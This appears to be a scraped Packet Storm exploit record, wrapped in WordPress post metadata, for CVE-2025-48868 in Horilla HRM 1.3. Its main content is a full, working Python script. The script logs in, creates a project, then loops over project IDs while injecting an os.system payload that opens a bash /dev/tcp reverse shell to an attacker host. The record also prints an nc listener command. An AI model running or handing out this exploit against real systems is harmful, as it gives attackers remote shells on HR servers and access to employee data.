{“lastseen”:”2026-04-10T17:17:25″,”description”:”Horilla versions 1.3 and below suffer from a remote command execution vulnerability…”,”published”:”2026-04-10T00:00:00″,”modified”:”2026-04-10T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Horilla 1.3 Remote Command Execution”,”source”:””,”references”:””,”id”:”PACKETSTORM:218656″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-48868″],”sourceData”:”# Exploit Title: Horilla v1.3 – RCE\\n # Date: 2025-05-29\\n # Exploit Author: Raghad Abdallah Al-syouf\\n # Version: \\u003c= 1.3\\n # Tested on: Ubuntu \/ Docker\\n # CVE: CVE-2025-48868\\n \\n \\n Description:\\n This script exploits the authenticated RCE vulnerability CVE-2025-48868.\\n It logs into the target web app, creates a project, and sends payloads\\n to achieve a reverse shell connection to a listener **started manually** by the user.\\n \\n Usage:\\n python3 CVE_2025_48868.py –url http[s]:\/\/target:port –user username –pass password –lhost YOUR_IP –lport LISTENER_PORT\\n \\n Example:\\n python3 CVE_2025_48868.py –url http:\/\/127.0.0.1:8000 –user admin –pass admin –lhost 192.168.1.100 –lport 4444\\n \\”\\”\\”\\n \\n import requests\\n import time\\n import sys\\n import argparse\\n from bs4 import BeautifulSoup\\n import urllib3\\n import random\\n import string\\n from datetime import datetime\\n \\n urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\\n \\n def generate_random_title():\\n letters = ”.join(random.choices(string.ascii_lowercase, k=4))\\n digits = ”.join(random.choices(string.digits, k=2))\\n return letters + digits\\n \\n def main():\\n print(\\”[+] CVE-2025-48868\\”)\\n \\n parser = argparse.ArgumentParser(description=’Exploit for CVE-2025-48868: Authenticated RCE in Horilla HRM software v1.3. Exploit by:Nakleh Said Zeidan’)\\n parser.add_argument(‘–url’, required=True, help=’Target URL, e.g. http:\/\/localhost:8000′)\\n parser.add_argument(‘–user’, required=True, help=’Username for login’)\\n parser.add_argument(‘–pass’, required=True, dest=’password’, help=’Password for login’)\\n parser.add_argument(‘–lhost’, required=True, help=’Attacker IP (listener must be started manually)’)\\n parser.add_argument(‘–lport’, required=True, type=int, help=’Attacker port (listener must be started manually)’)\\n \\n args = parser.parse_args()\\n \\n base_url = args.url.rstrip(‘\/’)\\n login_url = f\\”{base_url}\/login\/\\”\\n project_url = f\\”{base_url}\/project\/project-bulk-archive\\”\\n session = requests.Session()\\n headers = {\\n \\”User-Agent\\”: \\”Mozilla\/5.0\\”,\\n \\”X-Requested-With\\”: \\”XMLHttpRequest\\”\\n }\\n \\n print(\\”[+] Getting login page…\\”)\\n login_page = session.get(login_url, headers=headers, verify=False)\\n if login_page.status_code != 200:\\n print(f\\”[-] Failed to load login page, status {login_page.status_code}\\”)\\n sys.exit(1)\\n \\n soup = BeautifulSoup(login_page.text, ‘html.parser’)\\n csrf_token = soup.find(‘input’, {‘name’: ‘csrfmiddlewaretoken’})[‘value’]\\n \\n login_data = {\\n \\”username\\”: args.user,\\n \\”password\\”: args.password,\\n \\”csrfmiddlewaretoken\\”: csrf_token\\n }\\n \\n print(\\”[+] Logging in…\\”)\\n login_resp = session.post(login_url, data=login_data, headers=headers, verify=False)\\n if login_resp.status_code != 200 or \\”logout\\” not in login_resp.text.lower():\\n print(\\”[-] Login failed\\”)\\n sys.exit(1)\\n print(\\”[+] Logged in successfully!\\”)\\n \\n project_view_url = f\\”{base_url}\/project\/project-view\/\\”\\n project_view = session.get(project_view_url, headers=headers, verify=False)\\n soup = BeautifulSoup(project_view.text, ‘html.parser’)\\n csrf_token = soup.find(‘input’, {‘name’: ‘csrfmiddlewaretoken’})[‘value’]\\n \\n print(\\”[+] Creating project…\\”)\\n create_project_url = f\\”{base_url}\/project\/create-project?\\”\\n today_str = datetime.now().strftime(\\”%Y-%m-%d\\”)\\n random_title = generate_random_title()\\n multipart_data = {\\n \\”is_active\\”: \\”on\\”,\\n \\”title\\”: random_title,\\n \\”managers\\”: \\”1\\”,\\n \\”members\\”: \\”1\\”,\\n \\”status\\”: \\”new\\”,\\n \\”start_date\\”: today_str,\\n \\”end_date\\”: today_str,\\n \\”description\\”: \\”Exploit project\\”\\n }\\n \\n create_headers = {\\n \\”User-Agent\\”: \\”Mozilla\/5.0\\”,\\n \\”Accept\\”: \\”*\/*\\”,\\n \\”Referer\\”: project_view_url,\\n \\”HX-Request\\”: \\”true\\”,\\n \\”HX-Trigger\\”: \\”hlvd701Form\\”,\\n \\”HX-Target\\”: \\”hlvd701Form\\”,\\n \\”HX-Current-URL\\”: project_view_url,\\n \\”X-CSRFToken\\”: csrf_token,\\n \\”Origin\\”: base_url,\\n \\”DNT\\”: \\”1\\”,\\n \\”Connection\\”: \\”keep-alive\\”,\\n }\\n \\n create_resp = session.post(create_project_url, data=multipart_data, headers=create_headers, verify=False)\\n if create_resp.status_code == 200:\\n print(f\\”[+] Project created successfully with title: {random_title}\\”)\\n else:\\n print(f\\”[-] Project creation may have failed (status {create_resp.status_code}), continuing anyway…\\”)\\n \\n headers[\\”Referer\\”] = project_view_url\\n headers[\\”Origin\\”] = base_url\\n headers[\\”Content-Type\\”] = \\”application\/x-www-form-urlencoded; charset=UTF-8\\”\\n \\n print(\\”[*] Ensure your listener is running: `nc -lvnp {}`\\”.format(args.lport))\\n print(\\”[+] Sending payload…\\”)\\n \\n i = 1\\n while True:\\n encoded_ids = f\\”%5B%22{i}%22%5D\\”\\n payload = f\\”__import__(‘os’).system(‘bash+-c+\\\\\\”bash+-i+\\u003e%26+\/dev\/tcp\/{args.lhost}\/{args.lport}+0\\u003e%261\\\\\\”‘)\\”\\n exploit_url = f\\”{project_url}?is_active={payload}\\”\\n data = f\\”csrfmiddlewaretoken={csrf_token}\\u0026ids={encoded_ids}\\”\\n response = session.post(exploit_url, headers=headers, data=data, verify=False)\\n \\n if response.status_code == 200:\\n print(f\\”[+] Payload sent for project id {i}. Waiting for shell…\\”)\\n else:\\n print(f\\”[-] Error sending payload for project id {i} (status {response.status_code})\\”)\\n \\n time.sleep(3)\\n i += 1\\n \\n if __name__ == \\”__main__\\”:\\n main()”,”sourceHref”:”https:\/\/packetstorm.news\/download\/218656″,”cvss”:{“score”:7.2,”severity”:”HIGH”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:H\/UI:N\/S:U\/C:H\/I:H\/A:H”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/218656\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-04-10T17:17:25″,”description”:”Horilla versions 1.3 and below suffer from a remote command execution vulnerability…”,”published”:”2026-04-10T00:00:00″,”modified”:”2026-04-10T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Horilla 1.3 Remote Command Execution”,”source”:””,”references”:””,”id”:”PACKETSTORM:218656″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-48868″],”sourceData”:”# Exploit Title: Horilla v1.3 – RCE\\n # Date:…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,39,12,15,13,53,7,11,5],"class_list":["post-42357","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-72","tag-exploit","tag-high","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n